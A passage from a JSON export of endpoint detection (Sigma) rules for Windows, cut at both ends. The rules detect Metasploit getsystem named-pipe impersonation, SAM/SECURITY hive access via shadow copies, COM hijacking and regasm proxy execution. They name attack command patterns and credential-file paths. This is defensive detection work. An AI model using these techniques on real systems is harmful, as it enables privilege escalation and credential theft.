"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077208Z",
"creation_date": "2026-03-23T11:45:34.077210Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077214Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.rapid7.com/metasploit/meterpreter-getsystem/",
"https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70",
"https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c",
"https://attack.mitre.org/techniques/T1134/001/"
],
"name": "t1134_001_metasploit_get_system.yml",
"content": "title: Metasploit Get SYSTEM Command Detected\nid: 02ce0f33-c820-4f8d-8af4-6118aa5e0f86\ndescription: |\n Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\n Metasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\n Metasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\n It is recommended to investigate other malicious actions taken by the detected process and its ancestors.\nreferences:\n - https://docs.rapid7.com/metasploit/meterpreter-getsystem/\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2022/02/14\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1134.001\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Metasploit\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_services:\n ParentImage|endswith: '\\services.exe'\n\n selection_variant_cmd:\n # cmd.exe /c echo lddocl > \\\\.\\pipe\\lddocl\n Image|endswith: '\\cmd.exe'\n CommandLine|endswith: '/c echo ?????? > \\\\\\\\.\\\\pipe\\\\??????'\n\n selection_variant_rundll32:\n # rundll32.exe C:\\Windows\\TEMP\\lddocl.dll,a /p:lddocl\n Image|endswith: '\\rundll32.exe'\n CommandLine|endswith: '??????.dll,a /p:??????'\n\n condition: selection_services and 1 of selection_variant_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86",
"rule_name": "Metasploit Get SYSTEM Command Detected",
"rule_description": "Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\nMetasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\nMetasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\nIt is recommended to investigate other malicious actions taken by the detected process and its ancestors.\n",
"rule_creation_date": "2022-02-14",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1134.001",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079579Z",
"creation_date": "2026-03-23T11:45:34.079581Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079586Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1003/004/"
],
"name": "t1003_registry_extract_shadowcopy.yml",
"content": "title: Sensitive Registry Hive Dumped from Volume Shadow Copy\nid: 02fc96b9-8da8-4b40-8a75-557d9c2f79d3\ndescription: |\n Detects file accesses to registry hives saved inside a Volume Shadow Copy.\n Attackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\n This can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\n It is recommended to investigate the process trying to access the hives for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2023/06/26\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.002\n - attack.t1003.004\n - classification.Windows.Source.ShadowCopy\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_shadowcopy\n product: windows\ndetection:\n selection:\n Path|endswith:\n - '\\Windows\\System32\\config\\SYSTEM'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\RegBack\\SYSTEM'\n - '\\Windows\\System32\\config\\RegBack\\SAM'\n - '\\Windows\\System32\\config\\RegBack\\SECURITY'\n # - '\\Windows\\System32\\config\\SOFTWARE' # too many FP\n\n selection_remote_system:\n # Impacket’s secretsdump used with the option —use-remoteSSMethod.\n ProcessName: 'system'\n ProcessId: '4'\n SessionLogonType: 3\n\n exclusion_known_fp_win7:\n # seems to happen on win7 and 2008\n CreateOptionsStr:\n - 'FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0140 / FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n - 'FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0160 FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n CreateDispositionStr: 'FILE_OPEN' # 0x01 / FILE_OPEN\n\n exclusion_restore_point_creation:\n ProcessCommandLine:\n - '?:\\windows\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n - '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_wbengine:\n ProcessImage: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\system32\\vssvc.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpDlpService.exe'\n\n # another specific rule for this\n exclusion_ntdsutil:\n ProcessImage: '?:\\Windows\\System32\\ntdsutil.exe'\n\n exclusion_trusted_installer:\n ProcessImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sdrsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k SDRSVC'\n\n exclusion_rstrui:\n ProcessImage: '?:\\Windows\\system32\\rstrui.exe'\n\n exclusion_recoverydrive:\n # Recovery Media Creator\n ProcessImage: '?:\\Windows\\System32\\RecoveryDrive.exe'\n\n exclusion_search_protocolhost:\n ProcessImage: '?:\\Windows\\System32\\SearchProtocolHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n\n exclusion_igfxcui:\n ProcessGrandparentImage: '?:\\Windows\\system32\\igfxCUIService.exe'\n ProcessImage: '?:\\Windows\\System32\\igfxEM.exe'\n\n exclusion_cobian:\n ProcessImage|endswith:\n - '\\Cobian Backup 1?\\cbVSCService1?.exe'\n - '\\Cobian Backup ??\\cbVSCService.exe'\n - '\\Cobian Backup ??\\cbService.exe'\n - '\\CobianBackup\\cbVSCService1?.exe'\n - '\\CobianBackup\\cbVSCService.exe'\n\n exclusion_commvault:\n # For an unknwn reseaon the file has a valid signature but we say it is unsigned...\n ProcessImage|endswith:\n - '\\Commvault\\ContentStore\\Base\\cvd.exe'\n - '\\Commvault\\Base\\CLBackup.exe'\n - '\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n ProcessSignature: 'Commvault Systems, Inc.'\n\n exclusion_dell:\n ProcessDescription: 'Avamar Backup Client'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Dell Technologies Inc.'\n - 'EMC Corporation'\n\n condition: selection and ((not 1 of exclusion_*) or selection_remote_system)\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3",
"rule_name": "Sensitive Registry Hive Dumped from Volume Shadow Copy",
"rule_description": "Detects file accesses to registry hives saved inside a Volume Shadow Copy.\nAttackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\nThis can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\nIt is recommended to investigate the process trying to access the hives for malicious contents.\n",
"rule_creation_date": "2023-06-26",
"rule_modified_date": "2025-10-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.002",
"attack.t1003.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "032b28af-b4ce-4476-a201-8b2896158878",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623666Z",
"creation_date": "2026-03-23T11:45:34.623668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623672Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html",
"https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
"https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
"https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/",
"https://github.com/eset/malware-ioc/blob/master/turla/README.adoc",
"https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_component_object_model_hijacking.yml",
"content": "title: Possible Component Object Model Hijacking\nid: 032b28af-b4ce-4476-a201-8b2896158878\ndescription: |\n Detects the possible hijacking of a Component Object Model (COM) in the registry.\n Attackers can use this method to achieve persistence through an event trigger execution.\n The DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\n It is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\nreferences:\n - https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html\n - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n - https://github.com/eset/malware-ioc/blob/master/turla/README.adoc\n - https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/09/29\nmodified: 2026/02/02\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.015\n - attack.execution\n - attack.t1559.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Hijacking\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_ehstorshell:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\InprocServer32\\(Default)'\n filter_ehstorshell:\n Details: '?:\\Windows\\System32\\EhStorShell.dll'\n\n selection_wmiutils:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)' # WbemDefaultPathParser\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EAC8A024-21E2-4523-AD73-A71A0AA2F56A}\\InprocServer32\\(Default)' # WbemQuery\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\\InprocServer32\\(Default)' # WbemStatusCode\n filter_wmiutils:\n Details: '%systemroot%\\system32\\wbem\\wmiutils.dll'\n\n selection_wmiprvsd:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4DE225BF-CF59-4CFC-85F7-68B90F185355}\\InprocServer32\\(Default)'\n filter_wmiprvsd:\n Details: '%systemroot%\\system32\\wbem\\wmiprvsd.dll'\n\n selection_wbemsvc:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemsvc:\n Details: '%systemroot%\\system32\\wbem\\wbemsvc.dll'\n\n selection_wbemprox:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemprox:\n Details: '%systemroot%\\system32\\wbem\\wbemprox.dll'\n\n selection_applicationframe:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{DDC05A5A-351A-4E06-8EAF-54EC1BC2DCEA}\\InprocServer32\\(Default)'\n filter_applicationframe:\n Details: '%systemroot%\\system32\\applicationframe.dll'\n\n selection_propsys:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\InprocServer32\\(Default)'\n filter_propsys:\n Details: '%systemroot%\\system32\\propsys.dll'\n\n selection_actioncenter:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\\InprocServer32\\(Default)'\n filter_actioncenter:\n Details: '%systemroot%\\system32\\actioncenter.dll'\n\n selection_thumbcache:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32\\(Default)'\n filter_thumbcache:\n Details: '%systemroot%\\system32\\thumbcache.dll'\n\n selection_syncreg:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{f82b4ef1-93a9-4dde-8015-f7950a1a6e31}\\InprocServer32\\(Default)'\n filter_syncreg:\n Details: '%systemroot%\\system32\\syncreg.dll'\n\n selection_repdrvfs:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7998DC37-D3FE-487C-A60A-7701FCC70CC6}\\InprocServer32\\(Default)'\n filter_repdrvfs:\n Details: '?:\\Windows\\system32\\wbem\\repdrvfs.dll'\n\n selection_psfactorybuffer:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\\InprocServer32\\(Default)'\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1293C733-3151-48F5-89DE-2457B4AB3FD2}\\InprocServer32\\(Default)'\n filter_psfactorybuffer:\n Details:\n - '?:\\Windows\\System32\\npmproxy.dll'\n - '?:\\Windows\\System32\\daxexec.dll'\n\n selection_sharetaskscheduler:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\\InprocServer32\\(Default)'\n filter_sharetaskscheduler:\n Details: '?:\\Windows\\system32\\windows.storage.dll'\n\n selection_sharingprivate:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\\InprocServer32\\(Default)'\n filter_sharingprivate:\n Details: '?:\\Windows\\System32\\ntshrui.dll'\n\n selection_eventsystem:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\\InprocServer32\\(Default)'\n filter_eventsystem:\n Details: '?:\\Windows\\system32\\es.dll'\n\n selection_msaa:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32\\(Default)'\n filter_msaa:\n Details: '?:\\Windows\\System32\\oleacc.dll'\n\n selection_autoplay:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{9207D8C7-E7C8-412E-87F8-2E61171BD291}\\InprocServer32\\(Default)'\n filter_autoplay:\n Details: '?:\\Windows\\system32\\shell32.dll'\n\n selection_notificationmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{A3B3C46C-05D8-429B-BF66-87068B4CE563}\\InprocServer32\\(Default)'\n filter_notificationmanager:\n Details: '?:\\Windows\\System32\\actioncenter.dll'\n\n selection_commonplaces:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{0997898B-0713-11D2-A4AA-00C04F8EEB3E}\\InprocServer32\\(Default)'\n filter_commonplaces:\n Details: '?:\\Windows\\System32\\windows.storage.dll'\n\n selection_identitystore:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{30d49246-d217-465f-b00b-ac9ddd652eb7}\\InprocServer32\\(Default)'\n filter_identitystore:\n Details: '?:\\Windows\\System32\\IDStore.dll'\n\n selection_unexpectedshutdownreason:\n TargetObject|endswith: '\\CLSID\\{68DDBB56-9D1D-4FD9-89C5-C0DA2A625392}\\InProcServer32\\(Default)'\n filter_unexpectedshutdownreason:\n Details: '%SystemRoot%\\system32\\stobject.dll'\n\n selection_printers:\n TargetObject|endswith: '\\CLSID\\{2227A280-3AEA-1069-A2DE-08002B30309D}\\InProcServer32\\(Default)'\n filter_printers:\n Details: '%SystemRoot%\\system32\\prnfldr.dll'\n\n condition: selection and (\n (selection_ehstorshell and not filter_ehstorshell) or\n (selection_wmiutils and not filter_wmiutils) or\n (selection_wmiprvsd and not filter_wmiprvsd) or\n (selection_wbemsvc and not filter_wbemsvc) or\n (selection_wbemprox and not filter_wbemprox) or\n (selection_applicationframe and not filter_applicationframe) or\n (selection_propsys and not filter_propsys) or\n (selection_actioncenter and not filter_actioncenter) or\n (selection_thumbcache and not filter_thumbcache) or\n (selection_syncreg and not filter_syncreg) or\n (selection_repdrvfs and not filter_repdrvfs) or\n (selection_psfactorybuffer and not filter_psfactorybuffer) or\n (selection_sharetaskscheduler and not filter_sharetaskscheduler) or\n (selection_sharingprivate and not filter_sharingprivate) or\n (selection_eventsystem and not filter_eventsystem) or\n (selection_msaa and not filter_msaa) or\n (selection_autoplay and not filter_autoplay) or\n (selection_notificationmanager and not filter_notificationmanager) or\n (selection_commonplaces and not filter_commonplaces) or\n (selection_identitystore and not filter_identitystore) or\n (selection_unexpectedshutdownreason and not filter_unexpectedshutdownreason) or\n (selection_printers and not filter_printers)\n )\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "032b28af-b4ce-4476-a201-8b2896158878",
"rule_name": "Possible Component Object Model Hijacking",
"rule_description": "Detects the possible hijacking of a Component Object Model (COM) in the registry.\nAttackers can use this method to achieve persistence through an event trigger execution.\nThe DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\nIt is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2026-02-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.015",
"attack.t1559.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080770Z",
"creation_date": "2026-03-23T11:45:34.080773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080777Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
"https://attack.mitre.org/techniques/T1218/009/"
],
"name": "t1218_009_regasm_dll_load.yml",
"content": "title: Suspicious Proxy Execution via regasm.exe\nid: 0363e1f9-7a85-414e-a37a-5ce7993e7db4\ndescription: |\n Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\n This may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\n AWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\n Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\n This can also be used by program installers in Windows.\n It is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/01/04\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regasm\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\regasm.exe'\n OriginalFileName: 'regasm.exe'\n\n filter_directory:\n CommandLine|contains:\n - ' ?:\\Program Files\\'\n - ' ?:\\Program Files (x86)\\'\n - ' ?:\\PROGRA~2\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\'\n\n exclusion_pdf_creator:\n ParentCommandLine|contains: 'PDFCreator-*_*_*-setup.tmp'\n\n exclusion_installers:\n ParentImage|endswith: '\\MsiExec.exe'\n ParentCommandLine|contains:\n - '-Embedding'\n - '/V'\n - '-V'\n CommandLine|contains:\n # SOLIDWORKS 3D Modelling\n - '?:\\ProgramData\\SOLIDWORKS\\SOLIDWORKS CAM\\MATLIBx64\\ '\n # Microsoft CCM\n - 'Microsoft.ConfigurationManagement.SensorFramework.dll'\n - 'Microsoft.ConfigurationManager.SensorManagedProvider.dll'\n # Altova Script Editor\n - 'AltovaScriptFormEditorHost*.dll'\n # Oskab 3D\n - 'Oskab3D.SDB.dll'\n # MicroStrategy Office Plugin\n - '/tlb:moimain.tlb moimain.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\Tekla.Structures.Model\\\\*\\Tekla.Structures.Model.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\tekla.structures\\\\*\\tekla.structures.dll'\n - '?:\\programdata\\service advisor\\cal\\connectivity applications\\support\\regasm.exe*'\n - '?:\\program files\\bruker\\nanoscopeanalysis\\regasm.exe /s nanoscopeanalysis.exe /tlb:hostapplication.tlb'\n - '?:\\program files (x86)\\bl\\bl\\\\*\\\\*\\regasm.exe*'\n - '*\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\regasm.exe *\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\siga.softwareactivation.comwrapperspw.???'\n - '*\\regasm.exe /codebase *\\smsappl\\assemblies\\observationmetier.dll'\n - '?:\\users\\\\*\\temp\\is-*.tmp\\regasm.exe /s /* /tlb ?:\\users\\\\*\\temp\\is-*.tmp\\innosetuptools.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\intunecontentmanager\\microsoft.configurationmanager.intunecontentmanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.azuremanagement.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.cloudbase.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase bullzip.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase ie11cloudmetering.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase pdf7.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe ?:\\windows\\system32\\dolbyaposvc\\dax3apidll.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\contentstore\\base*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe datev.crystalreports.x64bridge.dll /tlb /nologo'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanagement.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsyncact.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\base\\\\*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe edisys.iulm.*.dll*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.agievision_pages.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.charmillestechnologymanager.dll /codebase'\n - 